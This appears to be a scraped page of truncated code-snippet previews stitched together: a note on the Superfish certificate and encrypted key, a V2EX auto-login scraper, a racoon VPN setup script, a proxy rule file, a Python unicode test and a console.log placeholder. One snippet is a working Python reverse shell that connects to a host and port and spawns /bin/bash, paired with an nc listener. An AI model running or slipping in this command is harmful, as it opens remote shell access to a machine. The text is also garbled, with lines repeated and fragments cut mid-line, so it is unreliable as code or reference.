superfish.pem contains:
- the Superfish certificate as found by both Chris Palmer and Matt Burke;
- the encrypted private key as found by Karl Koscher.
$ openssl x509 -in superfish.pem -text
Certificate:
Data:
Version: 3 (0x2)superfish.pem contains:
$ openssl x509 -in superfish.pem -text
Certificate:
Data:
Version: 3 (0x2)| # -*- coding: utf-8 -*- | |
| from bs4 import BeautifulSoup | |
| import requests | |
| username = '' ###账号### | |
| password = '' ###密码### | |
| login_url = 'http://v2ex.com/signin' ###如V2EX设置了使用 SSL,必须改 https### | |
| index_url = 'http://v2ex.com' ###同上### | |
| mission_url = 'http://www.v2ex.com/mission/daily' ###同上### | |
| UA = "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) \ |
| #! /bin/sh | |
| # 安装racoon | |
| apt-get install racoon | |
| # 配置racoon | |
| cat << _EOF_ > /etc/racoon/racoon.conf | |
| log notify; | |
| path pre_shared_key "/etc/racoon/psk.txt"; | |
| path certificate "/etc/racoon/certs"; | |
| listen { |
| # http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet | |
| # on the CLIENT, run the following: | |
| # nc -l 12345 | |
| # on the SERVER, start the "reverse shell" | |
| python -c "import sys,socket,os,pty; _,ip,port=sys.argv; s=socket.socket(); s.connect((ip,int(port))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn('/bin/bash')" 192.168.2.176 12345 | |
| # now go to the CLIENT, listen on port 12345 for incoming shell connections | |
| nc -l 12345 |
| [Proxy] | |
| WIFI = direct, interface=en2 | |
| VPN = direct, interface=utun0 | |
| [Rule] | |
| DOMAIN-SUFFIX,yach.me,WIFI | |
| FINAL,VPN |
| #!/usr/bin/env python | |
| # -*- coding: utf-8 -*- | |
| """ 测试 Python 在什么情况下会输出 Unicode 字符串 | |
| 需要首先理解在 Python 中 Unicode 类型和 Unicode 字符串指的不是同一个东西。 | |
| Unicode 字符串是 str 类型,但它的值的表现形式是 Unicode 编码形式。 | |
| """ | |
| def printt(str): |
| // Use Gists to store code you would like to remember later on | |
| console.log(window); // log the "window" object to the console |